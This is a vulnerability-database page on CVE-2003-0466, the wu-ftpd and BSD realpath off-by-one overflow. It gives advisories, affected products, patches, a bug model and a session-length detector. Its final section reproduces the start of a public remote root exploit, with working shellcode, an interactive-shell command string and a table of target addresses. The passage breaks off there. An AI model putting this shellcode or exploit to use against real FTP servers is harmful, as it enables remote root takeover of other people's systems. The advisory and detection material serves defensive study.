CVE-2003-0466
CVSS 10.0
Published: 2003-08-27 00:00:00
Revised: 2016-10-17 22:34:07

[Original] Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including (1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or (8) RNTO.
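As an added illustration (not code from this page, from wu-ftpd or from any BSD libc), the block below models the boundary mistake behind a "pathname of length MAXPATHLEN+1": a resolver appends "/" plus the next component to a MAXPATHLEN-byte buffer after checking prefix + separator + component against MAXPATHLEN, forgetting that the terminating NUL also needs a byte. A result of exactly MAXPATHLEN characters therefore passes the test and the NUL is stored one byte past the buffer. `MODEL_MAXPATHLEN` (1024, the BSD value), `join_vulnerable`, `join_fixed` and `probe` are names introduced here; the canary byte after the buffer exists only to make the single overwritten byte observable, and buffer and canary share one allocation so the demonstration stays inside memory the program owns.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: 1024 is MAXPATHLEN on the affected BSD libcs. A local constant
 * avoids clashing with the host's <sys/param.h> value. */
#define MODEL_MAXPATHLEN 1024
#define CANARY 0xAA

/* Pre-fix shape of the length test: it counts the "/" but not the NUL, so a
 * result of exactly MODEL_MAXPATHLEN characters is accepted and strcat()
 * stores the terminator at resolved[MODEL_MAXPATHLEN], one byte too far. */
static int join_vulnerable(char *resolved, const char *component)
{
    if (strlen(resolved) + strlen(component) + 1 > MODEL_MAXPATHLEN)
        return -1;                          /* ENAMETOOLONG */
    strcat(resolved, "/");
    strcat(resolved, component);
    return 0;
}

/* Fixed shape: the NUL needs a byte as well, so the character count must stay
 * strictly below MODEL_MAXPATHLEN. */
static int join_fixed(char *resolved, const char *component)
{
    if (strlen(resolved) + strlen(component) + 1 >= MODEL_MAXPATHLEN)
        return -1;
    strcat(resolved, "/");
    strcat(resolved, component);
    return 0;
}

/* Drive one variant with a prefix of prefix_len 'A's and a component of
 * component_len 'B's. The MAXPATHLEN-byte buffer and a one-byte canary share
 * a single allocation, so the overwrite is safe to observe.
 * Returns 0 if the join was rejected, 1 if accepted and in bounds,
 * 2 if accepted and the canary was overwritten, -1 on bad input or OOM. */
static int probe(int (*join)(char *, const char *),
                 size_t prefix_len, size_t component_len)
{
    unsigned char *region = malloc(MODEL_MAXPATHLEN + 1);
    char *component = malloc(component_len + 1);
    int rc = -1;

    if (region && component && prefix_len < MODEL_MAXPATHLEN) {
        memset(region, 'A', prefix_len);
        region[prefix_len] = '\0';
        region[MODEL_MAXPATHLEN] = CANARY;  /* first byte past the buffer */
        memset(component, 'B', component_len);
        component[component_len] = '\0';

        if (join((char *)region, component) != 0)
            rc = 0;
        else
            rc = (region[MODEL_MAXPATHLEN] == CANARY) ? 1 : 2;
    }
    free(region);
    free(component);
    return rc;
}

int main(void)
{
    /* 1000 + "/" + 23 = 1024 characters: exactly MAXPATHLEN, the trigger case */
    printf("vulnerable, 1024 chars: %d (2 = canary clobbered)\n",
           probe(join_vulnerable, 1000, 23));
    printf("fixed,      1024 chars: %d (0 = rejected)\n",
           probe(join_fixed, 1000, 23));
    /* 1023 characters fit together with their NUL in both variants */
    printf("vulnerable, 1023 chars: %d\n", probe(join_vulnerable, 1000, 22));
    printf("fixed,      1023 chars: %d\n", probe(join_fixed, 1000, 22));
    /* 1025 characters: both variants reject */
    printf("vulnerable, 1025 chars: %d\n", probe(join_vulnerable, 1000, 24));
    return 0;
}
```

The pair of calls for a 1024-character result is the interesting one: the pre-fix test accepts it and the canary reads 0x00 afterwards, while the fixed test returns ENAMETOOLONG. Whether that single NUL is exploitable depends on what the calling program keeps directly after its buffer, which is why the advisories' impact ranges from denial of service to code execution.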


[CNNVD] Multiple vendors' C library realpath() single-byte buffer overflow vulnerability (CNNVD-200308-136)

        
        realpath(3) resolves a given pathname to a canonical absolute pathname. The input may contain "/" characters, "/./" or "/../" segments and symbolic links; realpath(3) is part of the FreeBSD standard C library.
        realpath(3) has a single-byte overflow when computing the length of the resolved pathname. A local or remote attacker can exploit it to overflow a buffer in a service that uses the function and execute arbitrary instructions with that process's privileges.
        If the resolved pathname is 1024 bytes long (MAXPATHLEN on the affected systems) and contains two directory separators, the buffer passed to realpath(3) is overwritten by a single NUL byte one position past its end. Depending on the application that calls realpath(3), the result ranges from denial of service to arbitrary code execution and privilege escalation.
        On FreeBSD, several applications use realpath(3), for example:
        lukemftpd(8), an alternative FTP server, uses realpath(3) while handling the MLST and MLSD commands; the vulnerability can be exploited to execute arbitrary code with superuser privileges.
        sftp-server(8), part of OpenSSH, uses realpath(3) while handling the chdir command; the vulnerability can be exploited to execute arbitrary code with the privileges of the authenticated user.
        In FreeBSD 4.8-RELEASE, the FreeBSD Ports Collection contains the following applications that use realpath(3); they have not been audited to determine whether they are vulnerable or exploitable:
        BitchX-1.0c19_1
        Mowitz-0.2.1_1
        XFree86-clients-4.3.0_1
        abcache-0.14
        aim-1.5.234
        analog-5.24,1
        anjuta-1.0.1_1
        aolserver-3.4.2
        argus-2.0.5
        arm-rtems-gdb-5.2_1
        avr-gdb-5.2.1
        ccache-2.1.1
        cdparanoia-3.9.8_4
        cfengine-1.6.3_4
        cfengine2-2.0.3
        cmake-1.4.7
        comserv-1.4.3
        criticalmass-0.97
        dedit-0.6.2.3_1
        drweb_postfix-4.29.10a
        drweb-4.29.2
        drweb_sendmail-4.29.10a
        edonkey-gui-gtk-0.5.0
        enca-0.10.7
        epic4-1.0.1_2
        evolution-1.2.2_1
        exim-3.36_1
        exim-4.12_5
        exim-ldap-4.12_5
        exim-ldap2-4.12_5
        exim-mysql-4.12_5
        exim-postgresql-4.12_5
        fam-2.6.9_2
        fastdep-0.15
        feh-1.2.4_1
        ferite-0.99.6
        fileutils-4.1_1
        finfo-0.1
        firebird-1.0.2
        firebird-1.0.r2
        frontpage-5.0.2.2623_1
        galeon-1.2.8
        galeon2-1.3.2_1
        gdb-5.3_20030311
        gdb-5.2.1_1
        gdm2-2.4.1.3
        gecc-20021119
        gentoo-0.11.34
        gkrellmvolume-2.1.7
        gltron-0.61
        global-4.5.1
        gnat-3.15p
        gnomelibs-1.4.2_1
        gprolog-1.2.16
        gracula-3.0
        gringotts-1.2.3
        gtranslator-0.43_1
        gvd-1.2.5
        hercules-2.16.5
        hte-0.7.0
        hugs98-200211
        i386-rtems-gdb-5.2_1
        i960-rtems-gdb-5.2_1
        installwatch-0.5.6
        ivtools-1.0.6
        ja-epic4-1.0.1_2
        ja-gnomelibs-1.4.2_1
        ja-msdosfs-20001027
        ja-samba-2.2.7a.j1.1_1
        kdebase-3.1_1
        kdelibs-3.1
        kermit-8.0.206
        ko-BitchX-1.0c16_3
        ko-msdosfs-20001027
        leocad-0.73
        libfpx-1.2.0.4_1
        libgnomeui-2.2.0.1
        libpdel-0.3.4
        librep-0.16.1_1
        linux-beonex-0.8.1
        linux-divxplayer-0.2.0
        linux-edonkey-gui-gtk-0.2.0.a.2002.02.22
        linux-gnomelibs-1.2.8_2
        linux-mozilla-1.2
        linux-netscape-communicator-4.8
        linux-netscape-navigator-4.8
        linux-phoenix-0.3
        linux_base-6.1_4
        linux_base-7.1_2
        lsh-1.5.1
        lukemftpd-1.1_1
        m68k-rtems-gdb-5.2_1
        mips-rtems-gdb-5.2_1
        mod_php4-4.3.1
        moscow_ml-2.00_1
        mozilla-1.0.2_1
        mozilla-1.2.1_1,2
        mozilla-1.2.1_2
        mozilla-1.3b,1
        mozilla-1.3b
        mozilla-embedded-1.0.2_1
        mozilla-embedded-1.2.1_1,2
        mozilla-embedded-1.3b,1
        msyslog-1.08f_1
        netraider-0.0.2
        openag-1.1.1_1
        openssh-portable-3.5p1_1
        openssh-3.5
        p5-PPerl-0.23
        paragui-1.0.2_2
        powerpc-rtems-gdb-5.2_1
        psim-freebsd-5.2.1
        ptypes-1.7.4
        pure-ftpd-1.0.14
        qiv-1.8
        readlink-20010616
        reed-5.4
        rox-1.3.6_1
        rox-session-0.1.18_1
        rpl-1.4.0
        rpm-3.0.6_6
        samba-2.2.8
        samba-3.0a20
        scrollkeeper-0.3.11_8,1
        sh-rtems-gdb-5.2_1
        sharity-light-1.2_1
        siag-3.4.10
        skipstone-0.8.3
        sparc-rtems-gdb-5.2_1
        squeak-2.7
        squeak-3.2
        swarm-2.1.1
        tcl-8.2.3_2
        tcl-8.3.5
        tcl-8.4.1,1
        tcl-thread-8.1.b1
        teTeX-2.0.2_1
        wine-2003.02.19
        wml-2.0.8
        worker-2.7.0
        xbubble-0.2
        xerces-c2-2.1.0_1
        xerces_c-1.7.0
        xnview-1.50
        xscreensaver-gnome-4.08
        xscreensaver-4.08
        xworld-2.0
        yencode-0.46_1
        zh-cle_base-0.9p1
        zh-tcl-8.3.0
        zh-tw-BitchX-1.0c19_3
        zh-ve-1.0
        zh-xemacs-20.4_1
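The following detection-side check is added here as an example; it is not part of the FreeBSD advisory or of any vendor tool. It replays the client side of an FTP control-channel transcript, tracks the working directory through CWD from an assumed login home of /home/user, and flags any path-taking command (the eight named in the CVE text plus MLST and MLSD, which lukemftpd routes through realpath(3)) whose joined pathname reaches 1024 bytes, the trigger length. `MAXPATHLEN_WATCH`, `TRACK_CAP`, `ftp_session_flags`, `joined_path` and `sample_session` are names chosen here, and the transcript is constructed, modelled on the exploit later on this page (255-byte MKD/CWD components followed by one MKD that lands exactly on the boundary).

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAXPATHLEN_WATCH 1024   /* MAXPATHLEN on the affected BSD systems */
#define TRACK_CAP 8192          /* the monitor's own buffers, not the server's */

/* Path-taking commands that reach fb_realpath() per the CVE text, plus
 * MLST/MLSD, which lukemftpd routes through realpath(3). */
static const char *const PATH_CMDS[] = {
    "STOR", "RETR", "APPE", "DELE", "MKD", "RMD", "STOU", "RNTO", "MLST", "MLSD", NULL
};

static int is_path_cmd(const char *verb)
{
    for (int i = 0; PATH_CMDS[i]; i++)
        if (strcmp(verb, PATH_CMDS[i]) == 0) return 1;
    return 0;
}

/* cwd joined with arg, as the server would hand it to realpath(). Absolute
 * args replace cwd; dot segments are not collapsed, so the returned length is
 * an upper bound on the resolved one. Returns -1 if our buffer is too small. */
static int joined_path(char *out, size_t cap, const char *cwd, const char *arg)
{
    int n = (arg[0] == '/')         ? snprintf(out, cap, "%s", arg)
          : (strcmp(cwd, "/") == 0) ? snprintf(out, cap, "/%s", arg)
                                    : snprintf(out, cap, "%s/%s", cwd, arg);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Replay the client side of a CRLF-separated transcript, tracking CWD from
 * `home`. exact_only == 0: count path-taking commands whose joined pathname
 * is at or beyond MAXPATHLEN_WATCH (or does not fit at all);
 * exact_only != 0: count only those landing on exactly MAXPATHLEN_WATCH
 * characters, the off-by-one trigger. */
static int ftp_session_flags(const char *session, const char *home, int exact_only)
{
    char cwd[TRACK_CAP], path[TRACK_CAP], line[TRACK_CAP], verb[8];
    int flagged = 0;

    snprintf(cwd, sizeof cwd, "%s", home);
    for (const char *p = session; *p; ) {
        const char *eol = strchr(p, '\n');
        size_t full = eol ? (size_t)(eol - p) : strlen(p);
        size_t len = full < sizeof line ? full : sizeof line - 1;
        size_t v = 0;
        memcpy(line, p, len);
        line[len] = '\0';
        if (len && line[len - 1] == '\r') line[--len] = '\0';
        p = eol ? eol + 1 : p + full;

        /* split "VERB arg"; verbs compare case-insensitively */
        for (; v < len && line[v] != ' ' && v < sizeof verb - 1; v++)
            verb[v] = (char)toupper((unsigned char)line[v]);
        verb[v] = '\0';
        const char *arg = (v < len && line[v] == ' ') ? line + v + 1 : "";

        if (strcmp(verb, "CWD") == 0) {
            if (joined_path(path, sizeof path, cwd, arg) >= 0) strcpy(cwd, path);
        } else if (is_path_cmd(verb)) {
            int n = joined_path(path, sizeof path, cwd, arg);
            if (exact_only ? n == MAXPATHLEN_WATCH : (n < 0 || n >= MAXPATHLEN_WATCH))
                flagged++;
        }
    }
    return flagged;
}

/* Constructed transcript modelled on the exploit on this page: 255-byte
 * MKD/CWD components, then one MKD whose joined path is exactly 1024 bytes. */
static const char *sample_session(void)
{
    static char buf[4096];
    char comp[256];
    size_t off = 0;

    off += (size_t)snprintf(buf + off, sizeof buf - off,
                            "USER user\r\nPASS secret\r\nCWD /home/user\r\n");
    memset(comp, 'A', 255); comp[255] = '\0';
    for (int i = 0; i < 3; i++)                 /* cwd grows to 10 + 3*256 = 778 */
        off += (size_t)snprintf(buf + off, sizeof buf - off,
                                "MKD %s\r\nCWD %s\r\n", comp, comp);
    memset(comp, 'B', 245); comp[245] = '\0';   /* 778 + 1 + 245 = 1024: trigger */
    off += (size_t)snprintf(buf + off, sizeof buf - off,
                            "MKD %s\r\nRETR notes.txt\r\n", comp);
    memset(comp, 'C', 255); comp[255] = '\0';   /* 778 + 1 + 255 = 1034: over */
    snprintf(buf + off, sizeof buf - off, "STOR %s\r\n", comp);
    return buf;
}

int main(void)
{
    printf("%d command(s) at or beyond %d bytes, %d exactly on the boundary\n",
           ftp_session_flags(sample_session(), "/home/user", 0),
           MAXPATHLEN_WATCH,
           ftp_session_flags(sample_session(), "/home/user", 1));
    return 0;
}
```

Because dot segments are not collapsed, the measured length is an upper bound on what realpath(3) would compute, so the rule may over-flag contrived paths but will not miss one that actually lands on the boundary. The exploit further down this page logs in with a user account and write access; this check keys on path length alone, so it covers anonymous writable trees as well.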
        

- CVSS (base score)

CVSS score: 10 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can render the system completely unavailable]
Access complexity: LOW [no special conditions are required to exploit]
Access vector: NETWORK [the attacker needs neither local nor adjacent-network access]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:9.0::x86
cpe:/a:redhat:wu_ftpd:2.6.1-18::ia64
cpe:/a:washington_university:wu-ftpd:2.5.0
cpe:/a:redhat:wu_ftpd:2.6.1-18::i386
cpe:/o:freebsd:freebsd:4.1.1:release
cpe:/a:redhat:wu_ftpd:2.6.1-16::i386
cpe:/o:netbsd:netbsd:1.6.1  NetBSD 1.6.1
cpe:/o:apple:mac_os_x:10.2.6  Apple Mac OS X 10.2.6
cpe:/o:openbsd:openbsd:3.3  OpenBSD 3.3
cpe:/o:freebsd:freebsd:4.2  FreeBSD 4.2
cpe:/o:freebsd:freebsd:4.6:release
cpe:/o:openbsd:openbsd:3.0  OpenBSD 3.0
cpe:/o:freebsd:freebsd:4.3  FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.7:release
cpe:/o:freebsd:freebsd:4.8  FreeBSD 4.8
cpe:/o:freebsd:freebsd:4.6  FreeBSD 4.6
cpe:/o:freebsd:freebsd:4.3:release
cpe:/o:freebsd:freebsd:4.7  FreeBSD 4.7
cpe:/o:openbsd:openbsd:3.2  OpenBSD 3.2
cpe:/o:freebsd:freebsd:4.5:release
cpe:/o:openbsd:openbsd:3.1  OpenBSD 3.1
cpe:/o:freebsd:freebsd:5.0:alpha
cpe:/o:freebsd:freebsd:4.0  FreeBSD 4.0
cpe:/a:redhat:wu_ftpd:2.6.1-16::powerpc
cpe:/o:freebsd:freebsd:4.1  FreeBSD 4.1
cpe:/o:freebsd:freebsd:4.6.2  FreeBSD 4.6.2
cpe:/o:freebsd:freebsd:4.4  FreeBSD 4.4
cpe:/o:freebsd:freebsd:4.5  FreeBSD 4.5
cpe:/o:sun:solaris:9.0::sparc
cpe:/o:freebsd:freebsd:4.1.1:stable
cpe:/o:freebsd:freebsd:4.1.1  FreeBSD 4.1.1
cpe:/a:washington_university:wu-ftpd:2.6.1
cpe:/a:washington_university:wu-ftpd:2.6.0
cpe:/a:washington_university:wu-ftpd:2.6.2
cpe:/o:netbsd:netbsd:1.5.1  NetBSD 1.5.1
cpe:/o:netbsd:netbsd:1.5.3  NetBSD 1.5.3
cpe:/o:freebsd:freebsd:4.3:releng
cpe:/o:netbsd:netbsd:1.5.2  NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.6  NetBSD 1.6
cpe:/o:netbsd:netbsd:1.5  NetBSD 1.5
cpe:/o:freebsd:freebsd:4.4:releng
cpe:/o:freebsd:freebsd:4.8:pre-release
cpe:/o:openbsd:openbsd:2.9  OpenBSD 2.9
cpe:/o:openbsd:openbsd:2.8  OpenBSD 2.8
cpe:/o:openbsd:openbsd:2.5  OpenBSD 2.5
cpe:/o:openbsd:openbsd:2.4  OpenBSD 2.4
cpe:/o:openbsd:openbsd:2.1  OpenBSD 2.1
cpe:/o:openbsd:openbsd:2.0  OpenBSD 2.0
cpe:/o:openbsd:openbsd:2.7  OpenBSD 2.7
cpe:/o:openbsd:openbsd:2.6  OpenBSD 2.6
cpe:/o:openbsd:openbsd:2.3  OpenBSD 2.3
cpe:/o:openbsd:openbsd:2.2  OpenBSD 2.2
cpe:/a:redhat:wu_ftpd:2.6.2-8::i386
cpe:/o:freebsd:freebsd:4.0:alpha
cpe:/o:freebsd:freebsd:5.0  FreeBSD 5.0
cpe:/o:freebsd:freebsd:4.2:stable
cpe:/o:freebsd:freebsd:4.3:stable
cpe:/o:freebsd:freebsd:4.4:stable
cpe:/o:freebsd:freebsd:4.5:stable
cpe:/o:freebsd:freebsd:4.6:stable
cpe:/o:freebsd:freebsd:4.7:stable
cpe:/a:redhat:wu_ftpd:2.6.2-5::i386
cpe:/o:apple:mac_os_x_server:10.2.6  Apple Mac OS X Server 10.2.6

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1970  Off-by-one Error in fb_realpath()
*OVAL describes in detail how to detect this vulnerability; see the referenced OVAL definition for further technical detection details.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466
(official source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0466
(official source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-136
(official source) CNNVD

- Other links and resources

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-011.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2003-011.txt.asc
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0065.html
(VENDOR_ADVISORY)  VULNWATCH  20030731 wu-ftpd fb_realpath() off-by-one bug
http://download.immunix.org/ImmunixOS/7+/Updates/errata/IMNX-2003-7+-019-01
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-019-01
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
(UNKNOWN)  MISC  http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
http://marc.info/?l=bugtraq&m=105967301604815&w=2
(UNKNOWN)  BUGTRAQ  20030731 wu-ftpd fb_realpath() off-by-one bug
http://marc.info/?l=bugtraq&m=106001410028809&w=2
(UNKNOWN)  FREEBSD  FreeBSD-SA-03:08
http://marc.info/?l=bugtraq&m=106001702232325&w=2
(UNKNOWN)  BUGTRAQ  20030804 wu-ftpd-2.6.2 off-by-one remote exploit.
http://marc.info/?l=bugtraq&m=106002488209129&w=2
(UNKNOWN)  BUGTRAQ  20030804 Off-by-one Buffer Overflow Vulnerability in BSD libc realpath(3)
http://securitytracker.com/id?1007380
(UNKNOWN)  SECTRACK  1007380
http://sunsolve.sun.com/search/document.do?assetkey=1-77-1001257.1-1
(UNKNOWN)  SUNALERT  1001257
http://www.debian.org/security/2003/dsa-357
(UNKNOWN)  DEBIAN  DSA-357
http://www.kb.cert.org/vuls/id/743092
(VENDOR_ADVISORY)  CERT-VN  VU#743092
http://www.mandriva.com/security/advisories?name=MDKSA-2003:080
(UNKNOWN)  MANDRAKE  MDKSA-2003:080
http://www.novell.com/linux/security/advisories/2003_032_wuftpd.html
(UNKNOWN)  SUSE  SuSE-SA:2003:032
http://www.redhat.com/support/errata/RHSA-2003-245.html
(UNKNOWN)  REDHAT  RHSA-2003:245
http://www.redhat.com/support/errata/RHSA-2003-246.html
(UNKNOWN)  REDHAT  RHSA-2003:246
http://www.securityfocus.com/archive/1/424852/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060213 Latest wu-ftpd exploit :-s
http://www.securityfocus.com/archive/1/425061/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060214 Re: Latest wu-ftpd exploit :-s
http://www.securityfocus.com/bid/8315
(VENDOR_ADVISORY)  BID  8315
http://www.turbolinux.com/security/TLSA-2003-46.txt
(UNKNOWN)  TURBO  TLSA-2003-46
http://xforce.iss.net/xforce/xfdb/12785
(UNKNOWN)  XF  libc-realpath-offbyone-bo(12785)

- Vulnerability information

Multiple vendors' C library realpath() single-byte buffer overflow vulnerability
Critical  Boundary condition error
2003-08-27 00:00:00 2007-05-11 00:00:00
Remote
        

- Advisories and patches

        Vendor patches:
        FreeBSD
        -------
        FreeBSD has released a security advisory (FreeBSD-SA-03:08) and a corresponding patch:
        FreeBSD-SA-03:08: Single byte buffer overflow in realpath(3)
        Link: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:08.realpath.asc
        Patch download:
        # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:08/realpath.patch
        # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:08/realpath.patch.asc
        MandrakeSoft
        ------------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's site:
        Mandrake Upgrade wu-ftpd-2.6.2-1.1mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 Directory: 8.2/RPMS/
        Mandrake Upgrade wu-ftpd-2.6.2-1.1mdk.src.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 Directory: 8.2/SRPMS/
        Mandrake Upgrade wu-ftpd-2.6.2-1.1mdk.ppc.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2/PPC Directory: ppc/8.2/RPMS/
        Mandrake Upgrade wu-ftpd-2.6.2-1.1mdk.src.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2/PPC Directory: ppc/8.2/SRPMS/
        NetBSD
        ------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's site:
        NetBSD Patch SA2003-011-realpath.patch
        ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2003-011-realpath.patch
        OpenBSD
        -------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's site:
        OpenBSD Patch 015_realpath.patch
        ftp://ftp.OpenBSD.org/pub/OpenBSD/patches/3.2/common/015_realpath.patch
        RedHat
        ------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's site:
        RedHat Upgrade wu-ftpd-2.6.2-11.71.1.i386.rpm
        ftp://updates.redhat.com/7.1/en/os/i386/wu-ftpd-2.6.2-11.71.1.i386.rpm
        RedHat wu-ftpd-2.6.1-18.i386.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-11.72.1.i386.rpm
        ftp://updates.redhat.com/7.2/en/os/i386/wu-ftpd-2.6.2-11.72.1.i386.rpm
        RedHat wu-ftpd-2.6.2-5.i386.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-11.73.1.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/wu-ftpd-2.6.2-11.73.1.i386.rpm
        RedHat wu-ftpd-2.6.2-8.i386.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-12.i386.rpm
        ftp://updates.redhat.com/8.0/en/os/i386/wu-ftpd-2.6.2-12.i386.rpm
        RedHat wu-ftpd-2.6.1-18.ia64.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-11.72.1.ia64.rpm
        ftp://updates.redhat.com/7.2/en/os/ia64/wu-ftpd-2.6.2-11.72.1.ia64.rpm
        RedHat wu-ftpd-2.6.1-16.ppc.rpm :
        RedHat Upgrade wu-ftpd-2.6.2-11.71.1.ppc.rpm
        ftp://updates.redhat.com/7.1/en/os/iSeries/ppc/wu-ftpd-2.6.2-11.71.1.ppc.rpm
        RedHat Upgrade wu-ftpd-2.6.2-11.71.1.ppc.rpm
        ftp://updates.redhat.com/7.1/en/os/pSeries/ppc/wu-ftpd-2.6.2-11.71.1.ppc.rpm
        S.u.S.E.
        --------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's site:
        SuSE Upgrade wuftpd-2.6.0-403.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/wuftpd-2.6.0-403.i386.rpm
        SuSE-7.3 Intel
        SuSE Upgrade wuftpd-2.6.0-403.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/wuftpd-2.6.0-403.src.rpm
        SuSE-7.3 Intel
        SuSE Upgrade wuftpd-2.6.0-403.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/n2/wuftpd-2.6.0-403.i386.rpm
        SuSE-7.2 Intel
        SuSE Upgrade wuftpd-2.6.0-403.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/wuftpd-2.6.0-403.src.rpm
        SuSE-7.2 Intel
        SuSE Upgrade wuftpd-2.6.0-260.sparc.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/wuftpd-2.6.0-260.sparc.rpm
        SuSE-7.3 Sparc
        SuSE Upgrade wuftpd-2.6.0-260.src.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/wuftpd-2.6.0-260.src.rpm
        SuSE-7.3 Sparc
        SuSE Upgrade wuftpd-2.6.0-328.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/wuftpd-2.6.0-328.ppc.rpm
        SuSE-7.3 PPC
        SuSE Upgrade wuftpd-2.6.0-328.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/wuftpd-2.6.0-328.src.rpm
        SuSE-7.3 PPC

- Exploit information (EDB-ID 74)

wu-ftpd 2.6.2 off-by-one Remote Root Exploit (EDBID:74)
Platform: linux / Type: remote
Date: 2003-08-03 (Verified)
Port: 21 / Author: Xpl017Elz
Vulnerable application: N/A
/*
**
**  wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
**       exploit by "you dong-hun"(Xpl017Elz)
**  
**     Brute-Force function added.
**
*/

#define VERSION "v0.0.3"
#include <stdio.h>
#include <string.h>      /* strlen, strstr, memset, strncpy, strcmp */
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>   /* u_long, u_int */
#include <netinet/in.h>
#include <sys/socket.h>

#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"

void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();

struct os
{
int num;
char *v_nm;
u_long sh_addr;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char shellcode_ffx2[]=
/* setuid/chroot-break/execve shellcode by Lam3rZ */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";

struct os plat[]=
{
/*
** I enjoy version up, will not share more. :-}
*/
{
0,"RedHat Linux 6.x Version wu-2.6.0(1) compile",0x0806a59c
},
{
1,"RedHat Linux 6.x Version wu-2.6.1(1) compile",0x0806aad8
},
{
2,"RedHat Linux 6.x Version wu-2.6.2(2) compile",0x0806aa60
},
{
0x82,NULL,0x0
},
{
0x8282,"Brute-Force mode",0x0806a082
}
